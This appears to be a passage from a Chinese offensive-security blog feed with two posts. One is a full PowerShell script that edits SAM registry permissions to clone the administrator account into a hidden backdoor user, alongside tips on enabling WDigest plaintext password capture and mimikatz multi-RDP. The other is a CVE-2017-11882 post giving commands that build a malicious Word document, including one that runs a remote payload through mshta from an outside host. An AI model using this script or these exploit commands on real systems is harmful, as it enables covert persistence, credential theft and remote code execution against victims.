    ps:2012抓明文需要HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest的"UseLogonCredential"设置为1,类型为DWORD 32才可以,然后下次用户再登录,才能记录到明文密码。

    后来发现以前的建立克隆账号的方式是可以使得新建的账号登陆系统的,为了方便,整理了一个powershell脚本,脚本可以自动修改注册表键值权限(需要用administrator权限运行,及bypassuac以后的权限),之后在进行操作。具体代码如下:

    function Create-Clone
    {
    <#
    .SYNOPSIS
    This script requires Administrator privileges. use Invoke-TokenManipulation.ps1 to get system privileges and create the clone user.
    .PARAMETER u
    The clone username
    .PARAMETER p
    The clone user's password
    .PARAMETER cu
    The user to clone, default administrator
    .EXAMPLE
    Create-Clone -u evi1cg -p evi1cg123 -cu administrator
    #>
        Param(
            [Parameter(Mandatory=$true)]
            [String]
            $u,
    
            [Parameter(Mandatory=$true)]
            [String]
            $p,
    
            [Parameter(Mandatory=$false)]
            [String]
            $cu = "administrator"
        )
        function upReg{
            cmd /c "echo HKEY_LOCAL_MACHINE\SAM [1 17] >> $env:temp\up.ini"
            cmd /c "echo HKEY_LOCAL_MACHINE\SAM\SAM [1 17] >> $env:temp\up.ini"
            cmd /c "echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains [1 17] >> $env:temp\up.ini"
            cmd /c "echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account [1 17] >> $env:temp\up.ini"
            cmd /c "echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users [1 17] >> $env:temp\up.ini"
            cmd /c "echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names [1 17] >> $env:temp\up.ini"
            cmd /c "regini $env:temp\up.ini"
            Remove-Item $env:temp\up.ini
    
        }
        function downreg {
            cmd /c "echo HKEY_LOCAL_MACHINE\SAM [17] >> $env:temp\down.ini"
            cmd /c "echo HKEY_LOCAL_MACHINE\SAM\SAM [17] >> $env:temp\down.ini"
            cmd /c "echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains [17] >> $env:temp\down.ini"
            cmd /c "echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account [17] >> $env:temp\down.ini"
            cmd /c "echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users [17] >> $env:temp\down.ini"
            cmd /c "echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names [17] >> $env:temp\down.ini"
            cmd /c "regini $env:temp\down.ini"
            Remove-Item $env:temp\down.ini
        }
        function Create-user ([string]$Username,[string]$Password) {
            $group = "Administrators"
            $existing = Test-Path -path "HKLM:\SAM\SAM\Domains\Account\Users\Names\$Username"
            if (!$existing) {
                Write-Host "[*] Creating new local user $Username with password $Password"
                & NET USER $Username $Password /add /y /expires:never | Out-Null
                Write-Host "[*] Adding local user $Username to $group."
                & NET LOCALGROUP $group $Username /add | Out-Null
    
            }
            else {
                $adsi = [ADSI]"WinNT://$env:COMPUTERNAME"
                $exist = $adsi.Children | where {$_.SchemaClassName -eq 'user' -and $_.Name -eq $Username }
                Write-Host "[*] Setting password for existing local user $Username"
                $exist.SetPassword($Password)
            }
    
            Write-Host "[*] Ensuring password for $Username never expires."
            & WMIC USERACCOUNT WHERE "Name='$Username'" SET PasswordExpires=FALSE   | Out-Null
        }
        function GetUser-Key([string]$user)
        {
            if(Test-Path -Path "HKLM:\SAM\SAM\Domains\Account\Users\Names\$user"){
                cmd /c "regedit /e $env:temp\$user.reg "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\$user""
                $file = Get-Content "$env:temp\$user.reg"  | Out-String
                $pattern="@=hex\((.*?)\)\:"
                $file -match $pattern |Out-Null
                $key = "00000"+$matches[1]
                Write-Host "[!]"$key
                return $key
            }else {
                Write-Host "[-] SomeThing Wrong !"
            }
    
        }
        function Clone ([string]$ukey,[string]$cukey) {
            $ureg = "HKLM:\SAM\SAM\Domains\Account\Users\$ukey" |Out-String
            $cureg = "HKLM:\SAM\SAM\Domains\Account\Users\$cukey" |Out-String
            Write-Host "[*] Get clone user'F value"
            $cuFreg = Get-Item -Path $cureg.Trim()
            $cuFvalue = $cuFreg.GetValue('F')
            Write-Host "[*] Change user'F value"
            Set-ItemProperty -path $ureg.Trim()  -Name "F" -value $cuFvalue
            $outreg = "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\$ukey"
            cmd /c "regedit /e $env:temp\out.reg $outreg.Trim()"
        }
        function Main () {
            Write-Output "[*] Start"
            Write-Output "[*] Tring to change reg privilege !"
            upReg
            if( !(Test-Path -path "HKLM:\SAM\SAM\Domains\Account\Users\Names\$cu")){
                Write-Host "[-] The User to Clone does not exist"
                Write-Output "[*] Change reg privilege back !"
                downReg
                Write-Output "[*] Exiting !"
            }
            else {
                if(!(Test-Path -path "HKLM:\SAM\SAM\Domains\Account\Users\Names\$u")){
                    $tmp = "1"
                }
                else{
                    $tmp = "0"
                }
                Write-Output "[*] Create User..."
                Create-user $u $p
                Write-Output "[*] Get User $u's  Key .."
                $ukey = GetUser-Key $u |Out-String
                Write-Output "[*] Get User $cu's  Key .."
                $cukey = GetUser-Key $cu |Out-String
                Write-Output "[*] Clone User.."
                Clone $ukey $cukey
                if($tmp -eq 1 ){
                    Write-Output "[*] Delete User.."
                    cmd /c "net User $u /del " |Out-Null
                }else{ Write-Output "[*] Don't need to delete.."}
                cmd /c "regedit /s $env:temp\$u.reg"
                cmd /c "regedit /s $env:temp\out.reg"
                Remove-Item $env:temp\*.reg
                Write-Output "[*] Change reg privilege back !"
                downreg
                Write-Output "[*] Done"
            }
        }
        Main
    }
    

    GITHUB:

    新建账号以后,可成功登陆系统

    2.jpg

    在Win7上做的测试如下:

    demo

    当然可以配合这个姿势来实现多用户登陆。

    使用mimikatz.exe,执行ts::multirdp允许多用户远程登录

    ps:该方法在系统重启后失效,下次使用需要重新执行命令ts::multirdp,也可通过修改文件termsrv.dll实现永久修改


    0 0
  • 11/20/17--21:32: CVE-2017-11882利用 (chan 69772723)
  • 最近这段时间CVE-2017-11882挺火的。关于这个漏洞可以看看这里:隐藏17年的Office远程代码执行漏洞POC样本分析(CVE-2017-11882)

    今天在twitter上看到有人共享了一个POC,twitter地址poc地址,后来又看到有人共享了一个项目CVE-2017-11882,简单看了一下这个项目,通过对rtf文件的修改来实现命令执行的目的,但是有个缺陷就是,这个项目使用的是使用webdav的方式来执行远程文件的,使用起来可能并不容易,所以就对此文件进行了简单的修改,具体项目地址如下:GITHUB:
    使用方式很简单,如果要执行命令

    python Command_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o test.doc
    

    demo
    demo

    关于怎么进一步利用,可以参考之前写的《windows命令执行漏洞不会玩? 看我!》,由于有长度的限制,这里可以采用mshta的方式来执行。构造的命令如下:

    python Command_CVE-2017-11882.py -c "mshta http://site.com/abc" -o test.doc
    

    最终效果如下:
    1.gif